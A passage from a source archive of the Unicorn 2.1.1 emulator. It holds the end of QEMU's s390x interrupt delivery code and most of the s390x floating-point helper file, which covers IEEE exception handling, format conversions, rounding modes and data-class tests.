QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); uint64_t mask, addr; QEMUS390FlicIO *io; LowCore *lowcore; g_assert(env->psw.mask & PSW_MASK_IO); io = qemu_s390_flic_dequeue_io(flic, env->cregs[6]); g_assert(io); lowcore = cpu_map_lowcore(env); lowcore->subchannel_id = cpu_to_be16(io->id); lowcore->subchannel_nr = cpu_to_be16(io->nr); lowcore->io_int_parm = cpu_to_be32(io->parm); lowcore->io_int_word = cpu_to_be32(io->word); lowcore->io_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->io_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->io_new_psw.mask); addr = be64_to_cpu(lowcore->io_new_psw.addr); cpu_unmap_lowcore(lowcore); g_free(io); load_psw(env, mask, addr); } typedef struct MchkExtSaveArea { uint64_t vregs[32][2]; /* 0x0000 */ uint8_t pad_0x0200[0x0400 - 0x0200]; /* 0x0200 */ } MchkExtSaveArea; QEMU_BUILD_BUG_ON(sizeof(MchkExtSaveArea) != 1024); static int mchk_store_vregs(CPUS390XState *env, uint64_t mcesao) { hwaddr len = sizeof(MchkExtSaveArea); MchkExtSaveArea *sa; int i; sa = cpu_physical_memory_map(env_cpu(env)->as, mcesao, &len, true); if (!sa) { return -EFAULT; } if (len != sizeof(MchkExtSaveArea)) { cpu_physical_memory_unmap(env_cpu(env)->as, sa, len, 1, 0); return -EFAULT; } for (i = 0; i < 32; i++) { sa->vregs[i][0] = cpu_to_be64(env->vregs[i][0]); sa->vregs[i][1] = cpu_to_be64(env->vregs[i][1]); } cpu_physical_memory_unmap(env_cpu(env)->as, sa, len, 1, len); return 0; } static void do_mchk_interrupt(CPUS390XState *env) { QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); uint64_t mcic = s390_build_validity_mcic() | MCIC_SC_CP; uint64_t mask, addr, mcesao = 0; LowCore *lowcore; int i; /* for now we only support channel report machine checks (floating) */ g_assert(env->psw.mask & PSW_MASK_MCHECK); g_assert(env->cregs[14] & CR14_CHANNEL_REPORT_SC); qemu_s390_flic_dequeue_crw_mchk(flic); lowcore = cpu_map_lowcore(env); /* extended save area */ if (mcic & MCIC_VB_VR) { /* length and alignment is 1024 bytes */ mcesao = be64_to_cpu(lowcore->mcesad) & ~0x3ffull; } /* try to store vector registers */ if (!mcesao || mchk_store_vregs(env, mcesao)) { mcic &= ~MCIC_VB_VR; } /* we are always in z/Architecture mode */ lowcore->ar_access_id = 1; for (i = 0; i < 16; i++) { lowcore->floating_pt_save_area[i] = cpu_to_be64(*get_freg(env, i)); lowcore->gpregs_save_area[i] = cpu_to_be64(env->regs[i]); lowcore->access_regs_save_area[i] = cpu_to_be32(env->aregs[i]); lowcore->cregs_save_area[i] = cpu_to_be64(env->cregs[i]); } lowcore->prefixreg_save_area = cpu_to_be32(env->psa); lowcore->fpt_creg_save_area = cpu_to_be32(env->fpc); lowcore->tod_progreg_save_area = cpu_to_be32(env->todpr); lowcore->cpu_timer_save_area = cpu_to_be64(env->cputm); lowcore->clock_comp_save_area = cpu_to_be64(env->ckc >> 8); lowcore->mcic = cpu_to_be64(mcic); lowcore->mcck_old_psw.mask = cpu_to_be64(get_psw_mask(env)); lowcore->mcck_old_psw.addr = cpu_to_be64(env->psw.addr); mask = be64_to_cpu(lowcore->mcck_new_psw.mask); addr = be64_to_cpu(lowcore->mcck_new_psw.addr); cpu_unmap_lowcore(lowcore); load_psw(env, mask, addr); } void s390_cpu_do_interrupt(CPUState *cs) { QEMUS390FLICState *flic = QEMU_S390_FLIC(s390_get_flic()); S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; bool stopped = false; //qemu_log_mask(CPU_LOG_INT, "%s: %d at psw=%" PRIx64 ":%" PRIx64 "\n", // __func__, cs->exception_index, env->psw.mask, env->psw.addr); try_deliver: /* handle machine checks */ if (cs->exception_index == -1 && s390_cpu_has_mcck_int(cpu)) { cs->exception_index = EXCP_MCHK; } /* handle external interrupts */ if (cs->exception_index == -1 && s390_cpu_has_ext_int(cpu)) { cs->exception_index = EXCP_EXT; } /* handle I/O interrupts */ if (cs->exception_index == -1 && s390_cpu_has_io_int(cpu)) { cs->exception_index = EXCP_IO; } /* RESTART interrupt */ if (cs->exception_index == -1 && s390_cpu_has_restart_int(cpu)) { cs->exception_index = EXCP_RESTART; } /* STOP interrupt has least priority */ if (cs->exception_index == -1 && s390_cpu_has_stop_int(cpu)) { cs->exception_index = EXCP_STOP; } switch (cs->exception_index) { case EXCP_PGM: do_program_interrupt(env); break; case EXCP_SVC: do_svc_interrupt(env); break; case EXCP_EXT: do_ext_interrupt(env); break; case EXCP_IO: do_io_interrupt(env); break; case EXCP_MCHK: do_mchk_interrupt(env); break; case EXCP_RESTART: do_restart_interrupt(env); break; case EXCP_STOP: do_stop_interrupt(env); stopped = true; break; } if (cs->exception_index != -1 && !stopped) { /* check if there are more pending interrupts to deliver */ cs->exception_index = -1; goto try_deliver; } cs->exception_index = -1; /* we might still have pending interrupts, but not deliverable */ if (!env->pending_int && !qemu_s390_flic_has_any(flic)) { cs->interrupt_request &= ~CPU_INTERRUPT_HARD; } /* WAIT PSW during interrupt injection or STOP interrupt */ if ((env->psw.mask & PSW_MASK_WAIT) || stopped) { /* don't trigger a cpu_loop_exit(), use an interrupt instead */ cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HALT); } else if (cs->halted) { /* unhalt if we had a WAIT PSW somehwere in our injection chain */ s390_cpu_unhalt(cpu); } } #endif bool s390_cpu_exec_interrupt(CPUState *cs, int interrupt_request) { if (interrupt_request & CPU_INTERRUPT_HARD) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; if (env->ex_value) { /* Execution of the target insn is indivisible from the parent EXECUTE insn. */ return false; } if (s390_cpu_has_int(cpu)) { //s390_cpu_do_interrupt(cs); return true; } if (env->psw.mask & PSW_MASK_WAIT) { /* Woken up because of a floating interrupt but it has already * been delivered. Go back to sleep. */ cpu_interrupt(CPU(cpu), CPU_INTERRUPT_HALT); } } return false; } void s390x_cpu_debug_excp_handler(CPUState *cs) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; CPUWatchpoint *wp_hit = cs->watchpoint_hit; if (wp_hit && wp_hit->flags & BP_CPU) { /* FIXME: When the storage-alteration-space control bit is set, the exception should only be triggered if the memory access is done using an address space with the storage-alteration-event bit set. We have no way to detect that with the current watchpoint code. */ cs->watchpoint_hit = NULL; env->per_address = env->psw.addr; env->per_perc_atmid |= PER_CODE_EVENT_STORE | get_per_atmid(env); /* FIXME: We currently no way to detect the address space used to trigger the watchpoint. For now just consider it is the current default ASC. This turn to be true except when MVCP and MVCS instrutions are not used. */ env->per_perc_atmid |= env->psw.mask & (PSW_MASK_ASC) >> 46; /* Remove all watchpoints to re-execute the code. A PER exception will be triggered, it will call load_psw which will recompute the watchpoints. */ cpu_watchpoint_remove_all(cs, BP_CPU); cpu_loop_exit_noexc(cs); } } /* Unaligned accesses are only diagnosed with MO_ALIGN. At the moment, this is only for the atomic operations, for which we want to raise a specification exception. */ void s390x_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr) { S390CPU *cpu = S390_CPU(cs); CPUS390XState *env = &cpu->env; tcg_s390_program_interrupt(env, PGM_SPECIFICATION, retaddr); } void helper_uc_s390x_exit(CPUS390XState *env) { CPUState *cs = env_cpu(env); cs->exception_index = EXCP_HLT; cs->halted = 1; cpu_loop_exit(cs); }�������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/s390x/fpu_helper.c��������������������������������������������������������0000664�0000000�0000000�00000070123�14675241067�0020627�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * S/390 FPU helper routines * * Copyright (c) 2009 Ulrich Hecht * Copyright (c) 2009 Alexander Graf * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "internal.h" #include "tcg_s390x.h" #include "exec/exec-all.h" #include "exec/cpu_ldst.h" #include "exec/helper-proto.h" #include "fpu/softfloat.h" /* #define DEBUG_HELPER */ #ifdef DEBUG_HELPER #define HELPER_LOG(x, ...) qemu_log(x) #else #define HELPER_LOG(x, ...) #endif #define RET128(F) (env->retxl = F.low, F.high) uint8_t s390_softfloat_exc_to_ieee(unsigned int exc) { uint8_t s390_exc = 0; s390_exc |= (exc & float_flag_invalid) ? S390_IEEE_MASK_INVALID : 0; s390_exc |= (exc & float_flag_divbyzero) ? S390_IEEE_MASK_DIVBYZERO : 0; s390_exc |= (exc & float_flag_overflow) ? S390_IEEE_MASK_OVERFLOW : 0; s390_exc |= (exc & float_flag_underflow) ? S390_IEEE_MASK_UNDERFLOW : 0; s390_exc |= (exc & float_flag_inexact) ? S390_IEEE_MASK_INEXACT : 0; return s390_exc; } /* Should be called after any operation that may raise IEEE exceptions. */ static void handle_exceptions(CPUS390XState *env, bool XxC, uintptr_t retaddr) { unsigned s390_exc, qemu_exc; /* Get the exceptions raised by the current operation. Reset the fpu_status contents so that the next operation has a clean slate. */ qemu_exc = env->fpu_status.float_exception_flags; if (qemu_exc == 0) { return; } env->fpu_status.float_exception_flags = 0; s390_exc = s390_softfloat_exc_to_ieee(qemu_exc); /* * IEEE-Underflow exception recognition exists if a tininess condition * (underflow) exists and * - The mask bit in the FPC is zero and the result is inexact * - The mask bit in the FPC is one * So tininess conditions that are not inexact don't trigger any * underflow action in case the mask bit is not one. */ if (!(s390_exc & S390_IEEE_MASK_INEXACT) && !((env->fpc >> 24) & S390_IEEE_MASK_UNDERFLOW)) { s390_exc &= ~S390_IEEE_MASK_UNDERFLOW; } /* * FIXME: * 1. Right now, all inexact conditions are inidicated as * "truncated" (0) and never as "incremented" (1) in the DXC. * 2. Only traps due to invalid/divbyzero are suppressing. Other traps * are completing, meaning the target register has to be written! * This, however will mean that we have to write the register before * triggering the trap - impossible right now. */ /* * invalid/divbyzero cannot coexist with other conditions. * overflow/underflow however can coexist with inexact, we have to * handle it separatly. */ if (s390_exc & ~S390_IEEE_MASK_INEXACT) { if (s390_exc & ~S390_IEEE_MASK_INEXACT & env->fpc >> 24) { /* trap condition - inexact reported along */ tcg_s390_data_exception(env, s390_exc, retaddr); } /* nontrap condition - inexact handled differently */ env->fpc |= (s390_exc & ~S390_IEEE_MASK_INEXACT) << 16; } /* inexact handling */ if (s390_exc & S390_IEEE_MASK_INEXACT && !XxC) { /* trap condition - overflow/underflow _not_ reported along */ if (s390_exc & S390_IEEE_MASK_INEXACT & env->fpc >> 24) { tcg_s390_data_exception(env, s390_exc & S390_IEEE_MASK_INEXACT, retaddr); } /* nontrap condition */ env->fpc |= (s390_exc & S390_IEEE_MASK_INEXACT) << 16; } } int float_comp_to_cc(CPUS390XState *env, int float_compare) { switch (float_compare) { case float_relation_equal: return 0; case float_relation_less: return 1; case float_relation_greater: return 2; case float_relation_unordered: return 3; default: cpu_abort(env_cpu(env), "unknown return value for float compare\n"); } } /* condition codes for unary FP ops */ uint32_t set_cc_nz_f32(float32 v) { if (float32_is_any_nan(v)) { return 3; } else if (float32_is_zero(v)) { return 0; } else if (float32_is_neg(v)) { return 1; } else { return 2; } } uint32_t set_cc_nz_f64(float64 v) { if (float64_is_any_nan(v)) { return 3; } else if (float64_is_zero(v)) { return 0; } else if (float64_is_neg(v)) { return 1; } else { return 2; } } uint32_t set_cc_nz_f128(float128 v) { if (float128_is_any_nan(v)) { return 3; } else if (float128_is_zero(v)) { return 0; } else if (float128_is_neg(v)) { return 1; } else { return 2; } } static inline uint8_t round_from_m34(uint32_t m34) { return extract32(m34, 0, 4); } static inline bool xxc_from_m34(uint32_t m34) { /* XxC is bit 1 of m4 */ return extract32(m34, 4 + 3 - 1, 1); } /* 32-bit FP addition */ uint64_t HELPER(aeb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_add(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP addition */ uint64_t HELPER(adb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_add(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP addition */ uint64_t HELPER(axb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_add(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 32-bit FP subtraction */ uint64_t HELPER(seb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_sub(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP subtraction */ uint64_t HELPER(sdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_sub(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP subtraction */ uint64_t HELPER(sxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_sub(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 32-bit FP division */ uint64_t HELPER(deb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_div(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP division */ uint64_t HELPER(ddb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_div(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP division */ uint64_t HELPER(dxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_div(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 32-bit FP multiplication */ uint64_t HELPER(meeb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float32 ret = float32_mul(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP multiplication */ uint64_t HELPER(mdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float64_mul(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64/32-bit FP multiplication */ uint64_t HELPER(mdeb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { float64 ret = float32_to_float64(f2, &env->fpu_status); ret = float64_mul(f1, ret, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 128-bit FP multiplication */ uint64_t HELPER(mxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { float128 ret = float128_mul(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* 128/64-bit FP multiplication */ uint64_t HELPER(mxdb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t f2) { float128 ret = float64_to_float128(f2, &env->fpu_status); ret = float128_mul(make_float128(ah, al), ret, &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* convert 32-bit float to 64-bit float */ uint64_t HELPER(ldeb)(CPUS390XState *env, uint64_t f2) { float64 ret = float32_to_float64(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* convert 128-bit float to 64-bit float */ uint64_t HELPER(ldxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = float128_to_float64(make_float128(ah, al), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 128-bit float */ uint64_t HELPER(lxdb)(CPUS390XState *env, uint64_t f2) { float128 ret = float64_to_float128(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* convert 32-bit float to 128-bit float */ uint64_t HELPER(lxeb)(CPUS390XState *env, uint64_t f2) { float128 ret = float32_to_float128(f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return RET128(ret); } /* convert 64-bit float to 32-bit float */ uint64_t HELPER(ledb)(CPUS390XState *env, uint64_t f2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = float64_to_float32(f2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 32-bit float */ uint64_t HELPER(lexb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = float128_to_float32(make_float128(ah, al), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* 32-bit FP compare */ uint32_t HELPER(ceb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float32_compare_quiet(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 64-bit FP compare */ uint32_t HELPER(cdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float64_compare_quiet(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 128-bit FP compare */ uint32_t HELPER(cxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { int cmp = float128_compare_quiet(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } int s390_swap_bfp_rounding_mode(CPUS390XState *env, int m3) { int ret = env->fpu_status.float_rounding_mode; switch (m3) { case 0: /* current mode */ break; case 1: /* round to nearest with ties away from 0 */ set_float_rounding_mode(float_round_ties_away, &env->fpu_status); break; case 3: /* round to prepare for shorter precision */ set_float_rounding_mode(float_round_to_odd, &env->fpu_status); break; case 4: /* round to nearest with ties to even */ set_float_rounding_mode(float_round_nearest_even, &env->fpu_status); break; case 5: /* round to zero */ set_float_rounding_mode(float_round_to_zero, &env->fpu_status); break; case 6: /* round to +inf */ set_float_rounding_mode(float_round_up, &env->fpu_status); break; case 7: /* round to -inf */ set_float_rounding_mode(float_round_down, &env->fpu_status); break; default: g_assert_not_reached(); } return ret; } void s390_restore_bfp_rounding_mode(CPUS390XState *env, int old_mode) { set_float_rounding_mode(old_mode, &env->fpu_status); } /* convert 64-bit int to 32-bit float */ uint64_t HELPER(cegb)(CPUS390XState *env, int64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = int64_to_float32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit int to 64-bit float */ uint64_t HELPER(cdgb)(CPUS390XState *env, int64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = int64_to_float64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit int to 128-bit float */ uint64_t HELPER(cxgb)(CPUS390XState *env, int64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 ret = int64_to_float128(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return RET128(ret); } /* convert 64-bit uint to 32-bit float */ uint64_t HELPER(celgb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = uint64_to_float32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit uint to 64-bit float */ uint64_t HELPER(cdlgb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = uint64_to_float64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit uint to 128-bit float */ uint64_t HELPER(cxlgb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 ret = uint64_to_float128(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return RET128(ret); } /* convert 32-bit float to 64-bit int */ uint64_t HELPER(cgeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int64_t ret = float32_to_int64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 64-bit int */ uint64_t HELPER(cgdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int64_t ret = float64_to_int64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 64-bit int */ uint64_t HELPER(cgxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 v2 = make_float128(h, l); int64_t ret = float128_to_int64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 32-bit float to 32-bit int */ uint64_t HELPER(cfeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int32_t ret = float32_to_int32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 32-bit int */ uint64_t HELPER(cfdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); int32_t ret = float64_to_int32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 32-bit int */ uint64_t HELPER(cfxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 v2 = make_float128(h, l); int32_t ret = float128_to_int32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 32-bit float to 64-bit uint */ uint64_t HELPER(clgeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint64_t ret; v2 = float32_to_float64(v2, &env->fpu_status); ret = float64_to_uint64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 64-bit uint */ uint64_t HELPER(clgdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint64_t ret = float64_to_uint64(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 64-bit uint */ uint64_t HELPER(clgxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint64_t ret = float128_to_uint64(make_float128(h, l), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 32-bit float to 32-bit uint */ uint64_t HELPER(clfeb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint32_t ret = float32_to_uint32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 64-bit float to 32-bit uint */ uint64_t HELPER(clfdb)(CPUS390XState *env, uint64_t v2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint32_t ret = float64_to_uint32(v2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* convert 128-bit float to 32-bit uint */ uint64_t HELPER(clfxb)(CPUS390XState *env, uint64_t h, uint64_t l, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); uint32_t ret = float128_to_uint32(make_float128(h, l), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* round to integer 32-bit */ uint64_t HELPER(fieb)(CPUS390XState *env, uint64_t f2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float32 ret = float32_round_to_int(f2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* round to integer 64-bit */ uint64_t HELPER(fidb)(CPUS390XState *env, uint64_t f2, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float64 ret = float64_round_to_int(f2, &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return ret; } /* round to integer 128-bit */ uint64_t HELPER(fixb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint32_t m34) { int old_mode = s390_swap_bfp_rounding_mode(env, round_from_m34(m34)); float128 ret = float128_round_to_int(make_float128(ah, al), &env->fpu_status); s390_restore_bfp_rounding_mode(env, old_mode); handle_exceptions(env, xxc_from_m34(m34), GETPC()); return RET128(ret); } /* 32-bit FP compare and signal */ uint32_t HELPER(keb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float32_compare(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 64-bit FP compare and signal */ uint32_t HELPER(kdb)(CPUS390XState *env, uint64_t f1, uint64_t f2) { int cmp = float64_compare(f1, f2, &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 128-bit FP compare and signal */ uint32_t HELPER(kxb)(CPUS390XState *env, uint64_t ah, uint64_t al, uint64_t bh, uint64_t bl) { int cmp = float128_compare(make_float128(ah, al), make_float128(bh, bl), &env->fpu_status); handle_exceptions(env, false, GETPC()); return float_comp_to_cc(env, cmp); } /* 32-bit FP multiply and add */ uint64_t HELPER(maeb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float32 ret = float32_muladd(f2, f3, f1, 0, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP multiply and add */ uint64_t HELPER(madb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float64 ret = float64_muladd(f2, f3, f1, 0, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 32-bit FP multiply and subtract */ uint64_t HELPER(mseb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float32 ret = float32_muladd(f2, f3, f1, float_muladd_negate_c, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* 64-bit FP multiply and subtract */ uint64_t HELPER(msdb)(CPUS390XState *env, uint64_t f1, uint64_t f2, uint64_t f3) { float64 ret = float64_muladd(f2, f3, f1, float_muladd_negate_c, &env->fpu_status); handle_exceptions(env, false, GETPC()); return ret; } /* The rightmost bit has the number 11. */ static inline uint16_t dcmask(int bit, bool neg) { return 1 << (11 - bit - neg); } #define DEF_FLOAT_DCMASK(_TYPE) \ uint16_t _TYPE##_dcmask(CPUS390XState *env, _TYPE f1) \ { \ const bool neg = _TYPE##_is_neg(f1); \ \ /* Sorted by most common cases - only one class is possible */ \ if (_TYPE##_is_normal(f1)) { \ return dcmask(2, neg); \ } else if (_TYPE##_is_zero(f1)) { \ return dcmask(0, neg); \ } else if (_TYPE##_is_denormal(f1)) { \ return dcmask(4, neg); \ } else if (_TYPE##_is_infinity(f1)) { \ return dcmask(6, neg); \ } else if (_TYPE##_is_quiet_nan(f1, &env->fpu_status)) { \ return dcmask(8, neg); \ } \ /* signaling nan, as last remaining case */ \ return dcmask(10, neg); \ } DEF_FLOAT_DCMASK(float32) DEF_FLOAT_DCMASK(float64) DEF_FLOAT_DCMASK(float128) /* test data class 32-bit */ uint32_t HELPER(tceb)(CPUS390XState *env, uint64_t f1, uint64_t m2) { return (m2 & float32_dcmask(env, f1)) != 0; } 